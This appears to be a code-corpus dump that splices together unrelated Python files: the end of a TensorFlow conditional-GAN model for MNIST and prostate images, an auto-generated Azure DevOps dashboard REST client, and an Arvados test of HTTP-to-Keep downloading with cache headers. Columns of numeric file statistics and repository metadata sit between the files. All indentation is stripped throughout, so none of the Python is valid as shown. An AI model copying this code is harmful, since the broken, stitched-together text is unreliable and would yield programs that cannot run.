if self.config.DATA_NAME == "mnist":
image = self._add_noise(image)
yb = tf.reshape(y, [self.config.BATCH_SIZE, 1, 1, self.config.NUM_CLASSES])
image = self._conv_cond_concat(image, yb)
# first conv
h0 = self._conv2d(image, 1 + self.config.NUM_CLASSES, name = 'd_h0_conv')
h0 = tf.nn.leaky_relu(h0, alpha = 0.2, name = 'd_leaky0')
h0 = self._conv_cond_concat(h0, yb)
# second conv
h1 = self._conv2d(h0, 64 + self.config.NUM_CLASSES, name = 'd_h1_conv')
h1 = self._batch_norm_contrib(h1, name = 'd_h1_bn', train = True)
h1 = tf.nn.leaky_relu(h1, alpha = 0.2, name = 'd_leaky1')
fm = h1
# reshape and concat the label
h1 = tf.reshape(h1, [self.config.BATCH_SIZE, -1])
h1 = tf.concat([h1, y], 1)
## fc layer
h2 = self._linear_fc(h1, 1024, 'd_h2_lin')
h2 = self._batch_norm_contrib(h2, name = 'd_h2_bn', train = True)
h2= tf.nn.leaky_relu(h2, alpha = 0.2, name = 'd_leaky2')
h2 = tf.concat([h2, y], 1)
if self.config.MINIBATCH_DIS:
f = self._minibatch_discrimination(h2, 100)
h2 = tf.concat([h2, f], 1)
h3 = self._linear_fc(h2, 1, 'd_h3_lin')
return tf.nn.sigmoid(h3), h3, fm
elif self.config.DATA_NAME == "prostate":
image = self._add_noise(image)
yb = tf.reshape(y, [self.config.BATCH_SIZE, 1, 1, self.config.NUM_CLASSES])
image = self._conv_cond_concat(image, yb)
h0 = self._conv2d(image, 64, name='d_h0_conv')
h0 = tf.nn.leaky_relu(h0)
h0 = self._conv_cond_concat(h0, yb)
h1 = self._conv2d(h0, 64 * 2, name='d_h1_conv')
h1 = self._batch_norm_contrib(h1, name='d_h1_bn', train=True)
h1 = tf.nn.leaky_relu(h1)
h1 = self._conv_cond_concat(h1, yb)
h2 = self._conv2d(h1, 64 * 4, name='d_h2_conv')
h2 = self._batch_norm_contrib(h2, name='d_h2_bn', train=True)
h2 = tf.nn.leaky_relu(h2)
h2 = self._conv_cond_concat(h2, yb)
h3 = self._conv2d(h2, 64 * 8, name='d_h3_conv')
h3 = self._batch_norm_contrib(h3, name='d_h3_bn', train=True)
h3 = tf.nn.leaky_relu(h3)
fm = h3
h3 = self._conv_cond_concat(h3, yb)
h4 = tf.reshape(h3, [self.config.BATCH_SIZE, -1])
if self.config.MINIBATCH_DIS:
f = self._minibatch_discrimination(h4, 100)
h4 = tf.concat([h4, f], 1)
h4 = tf.concat([h4, y], 1)
h4 = self._linear_fc(h4, 1, 'd_h4_lin')
return tf.nn.sigmoid(h4), h4, fm
def forward_pass(self, z, image, label = None):
"""
:param z: latent variable
:param image: input image
:param label: input label (e.g. mnist)
:return:
"""
if self.config.LOSS == "MRGAN":
G = self.generator(z, label)
G_mr = self.generator(self.mrGAN_encoder(G), label, reuse = True)
D, D_logits, fm = self.discriminator(image, label, reuse = False)
D_, D_logits_, fm_ = self.discriminator(G, label, reuse = True)
D_mr, D_mr_logits, fm_mr = self.discriminator(G_mr, label, reuse = True)
return G, G_mr, D, D_logits, D_, D_logits_, fm, fm_, D_mr, D_mr_logits, fm_mr
else:
if self.config.LOSS == "PacGAN":
G_sep = []
for i in range(self.config.PAC_NUM):
reuse = True if i > 0 else False
G_sep.append(self.generator(z[i], label, reuse))
G = tf.concat(G_sep, 3)
else:
G = self.generator(z, label)
D, D_logits, fm = self.discriminator(image, label, reuse = False)
D_, D_logits_, fm_ = self.discriminator(G, label, reuse = True)
return G, D, D_logits, D_, D_logits_, fm, fm_
def sampler(self, z, y = None):
with tf.variable_scope("generator", reuse = tf.AUTO_REUSE) as scope:
if not self.config.Y_LABEL:
tf.logging.info("Apply unconditional GAN!")
if self.config.CHANNEL == 3:
# project 'z' and reshape
z = self._linear_fc(z, 64 * 8 * 4 * 4, 'g_h0_lin')
h0 = tf.reshape(z, [-1, 4, 4, 64 * 8])
h0 = self._batch_norm_contrib(h0, 'g_bn0', train = False)
h0 = tf.nn.relu(h0, 'g_rl0') ## [4, 4]
h1 = self._deconv2d(h0, 64 * 4, name='g_dconv0')
h1 = self._batch_norm_contrib(h1, 'g_bn1', train = False)
h1 = tf.nn.relu(h1, 'g_rl1') ## [8, 8]
h2 = self._deconv2d(h1, 64 * 2, name='g_dconv1')
h2 = self._batch_norm_contrib(h2, 'g_bn2', train = False)
h2 = tf.nn.relu(h2, 'g_rl2') ## [16, 16]
h3 = self._deconv2d(h2, 64 * 1, name='g_dconv2')
h3 = self._batch_norm_contrib(h3, 'g_bn3', train = False)
h3 = tf.nn.relu(h3, 'g_rl3') ## [32, 32]
h4 = self._deconv2d(h3, self.config.CHANNEL, name='g_dconv3')
h4 = tf.nn.tanh(h4)
## [64, 64]
return h4
else:
## first linear layer
h0 = self._linear_fc(z, 1024, 'g_h0_lin')
h0 = self._batch_norm_contrib(h0, 'g_bn0', train=True)
h0 = tf.nn.relu(h0, 'g_rl0')
## second linear layer
h1 = self._linear_fc(h0, self.config.BATCH_SIZE * 2 * 7 * 7, 'g_h1_lin')
h1 = self._batch_norm_contrib(h1, 'g_bn1', train=True)
h1 = tf.nn.relu(h1, 'g_rl1')
## reshape to conv feature pack and concat with label condition
h1 = tf.reshape(h1, [self.config.BATCH_SIZE, 7, 7, 64 * 2])
## first layer deconv
h2 = self._deconv2d(h1, 128, name='g_dconv0')
h2 = self._batch_norm_contrib(h2, 'g_bn2', train=True)
h2 = tf.nn.relu(h2, 'g_rl2')
## output layer: sigmoid to map the data range to [0, 1]
h3 = self._deconv2d(h2, 1, name='g_dconv1')
h3 = tf.nn.sigmoid(h3, name='sigmoid')
return h3
else:
tf.logging.info("Apply conditional GAN!")
if self.config.DATA_NAME == "mnist":
yb = tf.reshape(y, [self.config.BATCH_SIZE, 1, 1, self.config.NUM_CLASSES]) ## [None, 1, 1, 10]
z = tf.concat([z, y], 1) # concat the z and y in the latent space
## first linear layer
h0 = self._linear_fc(z, 1024, 'g_h0_lin')
h0 = self._batch_norm_contrib(h0, 'g_bn0', train = False)
h0 = tf.nn.relu(h0, 'g_rl0')
h0 = tf.concat([h0, y], 1)
## second linear layer
h1 = self._linear_fc(h0, self.config.BATCH_SIZE * 2 * 7 * 7, 'g_h1_lin')
h1 = self._batch_norm_contrib(h1, 'g_bn1', train = False)
h1 = tf.nn.relu(h1, 'g_rl1')
## reshape to conv feature pack and concat with label condition
h1 = tf.reshape(h1, [self.config.BATCH_SIZE, 7, 7, 64 * 2])
h1 = self._conv_cond_concat(h1, yb)
## first layer deconv
h2 = self._deconv2d(h1, 128, name='g_dconv0')
h2 = self._batch_norm_contrib(h2, 'g_bn2', train = False)
h2 = tf.nn.relu(h2, 'g_rl2')
h2 = self._conv_cond_concat(h2, yb)
## output layer: sigmoid to map the data range to [0, 1]
h3 = self._deconv2d(h2, 1, name='g_dconv1')
h3 = tf.nn.sigmoid(h3, name='sigmoid')
return h3
elif self.config.DATA_NAME == "prostate":
# project 'z' and reshape
yb = tf.reshape(y, [self.config.BATCH_SIZE, 1, 1, self.config.NUM_CLASSES])
z = tf.concat([z, y], 1)
z = self._linear_fc(z, 64 * 8 * 4 * 4, 'g_h0_lin')
h0 = tf.reshape(z, [-1, 4, 4, 64 * 8])
h0 = self._batch_norm_contrib(h0, 'g_bn0', train=True)
h0 = tf.nn.relu(h0, 'g_rl0') ## [4, 4]
h0 = self._conv_cond_concat(h0, yb)
h1 = self._deconv2d(h0, 64 * 4, name='g_dconv0')
h1 = self._batch_norm_contrib(h1, 'g_bn1', train=True)
h1 = tf.nn.relu(h1, 'g_rl1') ## [8, 8]
h1 = self._conv_cond_concat(h1, yb)
h2 = self._deconv2d(h1, 64 * 2, name='g_dconv1')
h2 = self._batch_norm_contrib(h2, 'g_bn2', train=True)
h2 = tf.nn.relu(h2, 'g_rl2') ## [16, 16]
h2 = self._conv_cond_concat(h2, yb)
h3 = self._deconv2d(h2, 64 * 1, name='g_dconv2')
h3 = self._batch_norm_contrib(h3, 'g_bn3', train=True)
h3 = tf.nn.relu(h3, 'g_rl3') ## [32, 32]
h3 = self._conv_cond_concat(h3, yb)
h4 = self._deconv2d(h3, 3, name='g_dconv3')
h4 = tf.nn.tanh(h4)
## [64, 64]
return h4
if __name__ == "__main__":
pass
| 46.857143
| 116
| 0.473276
| 2,721
| 20,992
| 3.422639
| 0.060272
| 0.0262
| 0.060024
| 0.092344
| 0.901965
| 0.875013
| 0.856545
| 0.850532
| 0.8326
| 0.817674
| 0
| 0.076166
| 0.404583
| 20,992
| 448
| 117
| 46.857143
| 0.668934
| 0.067073
| 0
| 0.81962
| 0
| 0
| 0.059399
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018987
| false
| 0.006329
| 0.009494
| 0
| 0.082278
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6508705806dd8a9df7750b2fb3390baad4a94dcd
| 19,297
|
py
|
Python
|
vsts/vsts/dashboard/v4_0/dashboard_client.py
|
kenkuo/azure-devops-python-api
|
9e920bd25e938fa89ff7f60153e5b9e113ca839d
|
[
"MIT"
] | null | null | null |
vsts/vsts/dashboard/v4_0/dashboard_client.py
|
kenkuo/azure-devops-python-api
|
9e920bd25e938fa89ff7f60153e5b9e113ca839d
|
[
"MIT"
] | null | null | null |
vsts/vsts/dashboard/v4_0/dashboard_client.py
|
kenkuo/azure-devops-python-api
|
9e920bd25e938fa89ff7f60153e5b9e113ca839d
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest import Serializer, Deserializer
from ...vss_client import VssClient
from . import models
class DashboardClient(VssClient):
"""Dashboard
:param str base_url: Service URL
:param Authentication creds: Authenticated credentials.
"""
def __init__(self, base_url=None, creds=None):
super(DashboardClient, self).__init__(base_url, creds)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
resource_area_identifier = '31c84e0a-3ece-48fd-a29d-100849af99ba'
def create_dashboard(self, dashboard, team_context):
"""CreateDashboard.
[Preview API]
:param :class:`<Dashboard> <dashboard.v4_0.models.Dashboard>` dashboard:
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:rtype: :class:`<Dashboard> <dashboard.v4_0.models.Dashboard>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
content = self._serialize.body(dashboard, 'Dashboard')
response = self._send(http_method='POST',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='4.0-preview.2',
route_values=route_values,
content=content)
return self._deserialize('Dashboard', response)
def delete_dashboard(self, team_context, dashboard_id):
"""DeleteDashboard.
[Preview API]
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
self._send(http_method='DELETE',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='4.0-preview.2',
route_values=route_values)
def get_dashboard(self, team_context, dashboard_id):
"""GetDashboard.
[Preview API]
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
:rtype: :class:`<Dashboard> <dashboard.v4_0.models.Dashboard>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
response = self._send(http_method='GET',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='4.0-preview.2',
route_values=route_values)
return self._deserialize('Dashboard', response)
def get_dashboards(self, team_context):
"""GetDashboards.
[Preview API]
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:rtype: :class:`<DashboardGroup> <dashboard.v4_0.models.DashboardGroup>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
response = self._send(http_method='GET',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='4.0-preview.2',
route_values=route_values)
return self._deserialize('DashboardGroup', response)
def replace_dashboard(self, dashboard, team_context, dashboard_id):
"""ReplaceDashboard.
[Preview API]
:param :class:`<Dashboard> <dashboard.v4_0.models.Dashboard>` dashboard:
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
:rtype: :class:`<Dashboard> <dashboard.v4_0.models.Dashboard>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
content = self._serialize.body(dashboard, 'Dashboard')
response = self._send(http_method='PUT',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='4.0-preview.2',
route_values=route_values,
content=content)
return self._deserialize('Dashboard', response)
def replace_dashboards(self, group, team_context):
"""ReplaceDashboards.
[Preview API]
:param :class:`<DashboardGroup> <dashboard.v4_0.models.DashboardGroup>` group:
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:rtype: :class:`<DashboardGroup> <dashboard.v4_0.models.DashboardGroup>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
content = self._serialize.body(group, 'DashboardGroup')
response = self._send(http_method='PUT',
location_id='454b3e51-2e6e-48d4-ad81-978154089351',
version='4.0-preview.2',
route_values=route_values,
content=content)
return self._deserialize('DashboardGroup', response)
def create_widget(self, widget, team_context, dashboard_id):
"""CreateWidget.
[Preview API]
:param :class:`<Widget> <dashboard.v4_0.models.Widget>` widget:
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
:rtype: :class:`<Widget> <dashboard.v4_0.models.Widget>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
content = self._serialize.body(widget, 'Widget')
response = self._send(http_method='POST',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='4.0-preview.2',
route_values=route_values,
content=content)
return self._deserialize('Widget', response)
def delete_widget(self, team_context, dashboard_id, widget_id):
"""DeleteWidget.
[Preview API]
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
:param str widget_id:
:rtype: :class:`<Dashboard> <dashboard.v4_0.models.Dashboard>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
if widget_id is not None:
route_values['widgetId'] = self._serialize.url('widget_id', widget_id, 'str')
response = self._send(http_method='DELETE',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='4.0-preview.2',
route_values=route_values)
return self._deserialize('Dashboard', response)
def get_widget(self, team_context, dashboard_id, widget_id):
"""GetWidget.
[Preview API]
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
:param str widget_id:
:rtype: :class:`<Widget> <dashboard.v4_0.models.Widget>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
if widget_id is not None:
route_values['widgetId'] = self._serialize.url('widget_id', widget_id, 'str')
response = self._send(http_method='GET',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='4.0-preview.2',
route_values=route_values)
return self._deserialize('Widget', response)
def replace_widget(self, widget, team_context, dashboard_id, widget_id):
"""ReplaceWidget.
[Preview API]
:param :class:`<Widget> <dashboard.v4_0.models.Widget>` widget:
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
:param str widget_id:
:rtype: :class:`<Widget> <dashboard.v4_0.models.Widget>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
if widget_id is not None:
route_values['widgetId'] = self._serialize.url('widget_id', widget_id, 'str')
content = self._serialize.body(widget, 'Widget')
response = self._send(http_method='PUT',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='4.0-preview.2',
route_values=route_values,
content=content)
return self._deserialize('Widget', response)
def update_widget(self, widget, team_context, dashboard_id, widget_id):
"""UpdateWidget.
[Preview API]
:param :class:`<Widget> <dashboard.v4_0.models.Widget>` widget:
:param :class:`<TeamContext> <dashboard.v4_0.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id:
:param str widget_id:
:rtype: :class:`<Widget> <dashboard.v4_0.models.Widget>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
if widget_id is not None:
route_values['widgetId'] = self._serialize.url('widget_id', widget_id, 'str')
content = self._serialize.body(widget, 'Widget')
response = self._send(http_method='PATCH',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='4.0-preview.2',
route_values=route_values,
content=content)
return self._deserialize('Widget', response)
def get_widget_metadata(self, contribution_id):
"""GetWidgetMetadata.
[Preview API]
:param str contribution_id:
:rtype: :class:`<WidgetMetadataResponse> <dashboard.v4_0.models.WidgetMetadataResponse>`
"""
route_values = {}
if contribution_id is not None:
route_values['contributionId'] = self._serialize.url('contribution_id', contribution_id, 'str')
response = self._send(http_method='GET',
location_id='6b3628d3-e96f-4fc7-b176-50240b03b515',
version='4.0-preview.1',
route_values=route_values)
return self._deserialize('WidgetMetadataResponse', response)
def get_widget_types(self, scope):
"""GetWidgetTypes.
[Preview API] Returns available widgets in alphabetical order.
:param str scope:
:rtype: :class:`<WidgetTypesResponse> <dashboard.v4_0.models.WidgetTypesResponse>`
"""
query_parameters = {}
if scope is not None:
query_parameters['$scope'] = self._serialize.query('scope', scope, 'str')
response = self._send(http_method='GET',
location_id='6b3628d3-e96f-4fc7-b176-50240b03b515',
version='4.0-preview.1',
query_parameters=query_parameters)
return self._deserialize('WidgetTypesResponse', response)
| 44.981352
| 122
| 0.577033
| 2,054
| 19,297
| 5.205453
| 0.078384
| 0.113169
| 0.039562
| 0.045829
| 0.853348
| 0.847175
| 0.832305
| 0.817153
| 0.808642
| 0.800037
| 0
| 0.030467
| 0.309426
| 19,297
| 428
| 123
| 45.086449
| 0.771875
| 0.20143
| 0
| 0.885246
| 0
| 0
| 0.109055
| 0.035651
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045902
| false
| 0
| 0.009836
| 0
| 0.101639
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
650b5f0598514bbe9fd5ea0de96ab848d2375ad0
| 10,825
|
py
|
Python
|
sdk/cwl/tests/test_http.py
|
rpatil524/arvados
|
c89213f5a5e303050caaebe4f8fdf2980fc65605
|
[
"ECL-2.0",
"Apache-2.0"
] | 222
|
2015-01-02T17:24:54.000Z
|
2019-11-27T06:31:51.000Z
|
sdk/cwl/tests/test_http.py
|
rpatil524/arvados
|
c89213f5a5e303050caaebe4f8fdf2980fc65605
|
[
"ECL-2.0",
"Apache-2.0"
] | 62
|
2015-03-12T20:22:06.000Z
|
2019-12-04T18:35:35.000Z
|
sdk/cwl/tests/test_http.py
|
rpatil524/arvados
|
c89213f5a5e303050caaebe4f8fdf2980fc65605
|
[
"ECL-2.0",
"Apache-2.0"
] | 75
|
2015-01-22T21:20:50.000Z
|
2019-12-03T08:52:23.000Z
|
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
from future import standard_library
standard_library.install_aliases()
import copy
import io
import functools
import hashlib
import json
import logging
import mock
import sys
import unittest
import datetime
import arvados
import arvados.collection
import arvados_cwl
import arvados_cwl.runner
import arvados.keep
from .matcher import JsonDiffMatcher, StripYAMLComments
from .mock_discovery import get_rootDesc
import arvados_cwl.http
import ruamel.yaml as yaml
class TestHttpToKeep(unittest.TestCase):
@mock.patch("requests.get")
@mock.patch("arvados.collection.Collection")
def test_http_get(self, collectionmock, getmock):
api = mock.MagicMock()
api.collections().list().execute.return_value = {
"items": []
}
cm = mock.MagicMock()
cm.manifest_locator.return_value = "zzzzz-4zz18-zzzzzzzzzzzzzz3"
cm.portable_data_hash.return_value = "99999999999999999999999999999998+99"
collectionmock.return_value = cm
req = mock.MagicMock()
req.status_code = 200
req.headers = {}
req.iter_content.return_value = ["abc"]
getmock.return_value = req
utcnow = mock.MagicMock()
utcnow.return_value = datetime.datetime(2018, 5, 15)
r = arvados_cwl.http.http_to_keep(api, None, "http://example.com/file1.txt", utcnow=utcnow)
self.assertEqual(r, "keep:99999999999999999999999999999998+99/file1.txt")
getmock.assert_called_with("http://example.com/file1.txt", stream=True, allow_redirects=True)
cm.open.assert_called_with("file1.txt", "wb")
cm.save_new.assert_called_with(name="Downloaded from http%3A%2F%2Fexample.com%2Ffile1.txt",
owner_uuid=None, ensure_unique_name=True)
api.collections().update.assert_has_calls([
mock.call(uuid=cm.manifest_locator(),
body={"collection":{"properties": {'http://example.com/file1.txt': {'Date': 'Tue, 15 May 2018 00:00:00 GMT'}}}})
])
@mock.patch("requests.get")
@mock.patch("arvados.collection.CollectionReader")
def test_http_expires(self, collectionmock, getmock):
api = mock.MagicMock()
api.collections().list().execute.return_value = {
"items": [{
"uuid": "zzzzz-4zz18-zzzzzzzzzzzzzz3",
"portable_data_hash": "99999999999999999999999999999998+99",
"properties": {
'http://example.com/file1.txt': {
'Date': 'Tue, 15 May 2018 00:00:00 GMT',
'Expires': 'Tue, 17 May 2018 00:00:00 GMT'
}
}
}]
}
cm = mock.MagicMock()
cm.manifest_locator.return_value = "zzzzz-4zz18-zzzzzzzzzzzzzz3"
cm.portable_data_hash.return_value = "99999999999999999999999999999998+99"
cm.keys.return_value = ["file1.txt"]
collectionmock.return_value = cm
req = mock.MagicMock()
req.status_code = 200
req.headers = {}
req.iter_content.return_value = ["abc"]
getmock.return_value = req
utcnow = mock.MagicMock()
utcnow.return_value = datetime.datetime(2018, 5, 16)
r = arvados_cwl.http.http_to_keep(api, None, "http://example.com/file1.txt", utcnow=utcnow)
self.assertEqual(r, "keep:99999999999999999999999999999998+99/file1.txt")
getmock.assert_not_called()
@mock.patch("requests.get")
@mock.patch("arvados.collection.CollectionReader")
def test_http_cache_control(self, collectionmock, getmock):
api = mock.MagicMock()
api.collections().list().execute.return_value = {
"items": [{
"uuid": "zzzzz-4zz18-zzzzzzzzzzzzzz3",
"portable_data_hash": "99999999999999999999999999999998+99",
"properties": {
'http://example.com/file1.txt': {
'Date': 'Tue, 15 May 2018 00:00:00 GMT',
'Cache-Control': 'max-age=172800'
}
}
}]
}
cm = mock.MagicMock()
cm.manifest_locator.return_value = "zzzzz-4zz18-zzzzzzzzzzzzzz3"
cm.portable_data_hash.return_value = "99999999999999999999999999999998+99"
cm.keys.return_value = ["file1.txt"]
collectionmock.return_value = cm
req = mock.MagicMock()
req.status_code = 200
req.headers = {}
req.iter_content.return_value = ["abc"]
getmock.return_value = req
utcnow = mock.MagicMock()
utcnow.return_value = datetime.datetime(2018, 5, 16)
r = arvados_cwl.http.http_to_keep(api, None, "http://example.com/file1.txt", utcnow=utcnow)
self.assertEqual(r, "keep:99999999999999999999999999999998+99/file1.txt")
getmock.assert_not_called()
@mock.patch("requests.get")
@mock.patch("requests.head")
@mock.patch("arvados.collection.Collection")
def test_http_expired(self, collectionmock, headmock, getmock):
api = mock.MagicMock()
api.collections().list().execute.return_value = {
"items": [{
"uuid": "zzzzz-4zz18-zzzzzzzzzzzzzz3",
"portable_data_hash": "99999999999999999999999999999998+99",
"properties": {
'http://example.com/file1.txt': {
'Date': 'Tue, 15 May 2018 00:00:00 GMT',
'Expires': 'Tue, 16 May 2018 00:00:00 GMT'
}
}
}]
}
cm = mock.MagicMock()
cm.manifest_locator.return_value = "zzzzz-4zz18-zzzzzzzzzzzzzz4"
cm.portable_data_hash.return_value = "99999999999999999999999999999997+99"
cm.keys.return_value = ["file1.txt"]
collectionmock.return_value = cm
req = mock.MagicMock()
req.status_code = 200
req.headers = {'Date': 'Tue, 17 May 2018 00:00:00 GMT'}
req.iter_content.return_value = ["def"]
getmock.return_value = req
headmock.return_value = req
utcnow = mock.MagicMock()
utcnow.return_value = datetime.datetime(2018, 5, 17)
r = arvados_cwl.http.http_to_keep(api, None, "http://example.com/file1.txt", utcnow=utcnow)
self.assertEqual(r, "keep:99999999999999999999999999999997+99/file1.txt")
getmock.assert_called_with("http://example.com/file1.txt", stream=True, allow_redirects=True)
cm.open.assert_called_with("file1.txt", "wb")
cm.save_new.assert_called_with(name="Downloaded from http%3A%2F%2Fexample.com%2Ffile1.txt",
owner_uuid=None, ensure_unique_name=True)
api.collections().update.assert_has_calls([
mock.call(uuid=cm.manifest_locator(),
body={"collection":{"properties": {'http://example.com/file1.txt': {'Date': 'Tue, 17 May 2018 00:00:00 GMT'}}}})
])
@mock.patch("requests.get")
@mock.patch("requests.head")
@mock.patch("arvados.collection.CollectionReader")
def test_http_etag(self, collectionmock, headmock, getmock):
api = mock.MagicMock()
api.collections().list().execute.return_value = {
"items": [{
"uuid": "zzzzz-4zz18-zzzzzzzzzzzzzz3",
"portable_data_hash": "99999999999999999999999999999998+99",
"properties": {
'http://example.com/file1.txt': {
'Date': 'Tue, 15 May 2018 00:00:00 GMT',
'Expires': 'Tue, 16 May 2018 00:00:00 GMT',
'ETag': '123456'
}
}
}]
}
cm = mock.MagicMock()
cm.manifest_locator.return_value = "zzzzz-4zz18-zzzzzzzzzzzzzz3"
cm.portable_data_hash.return_value = "99999999999999999999999999999998+99"
cm.keys.return_value = ["file1.txt"]
collectionmock.return_value = cm
req = mock.MagicMock()
req.status_code = 200
req.headers = {
'Date': 'Tue, 17 May 2018 00:00:00 GMT',
'Expires': 'Tue, 19 May 2018 00:00:00 GMT',
'ETag': '123456'
}
headmock.return_value = req
utcnow = mock.MagicMock()
utcnow.return_value = datetime.datetime(2018, 5, 17)
r = arvados_cwl.http.http_to_keep(api, None, "http://example.com/file1.txt", utcnow=utcnow)
self.assertEqual(r, "keep:99999999999999999999999999999998+99/file1.txt")
getmock.assert_not_called()
cm.open.assert_not_called()
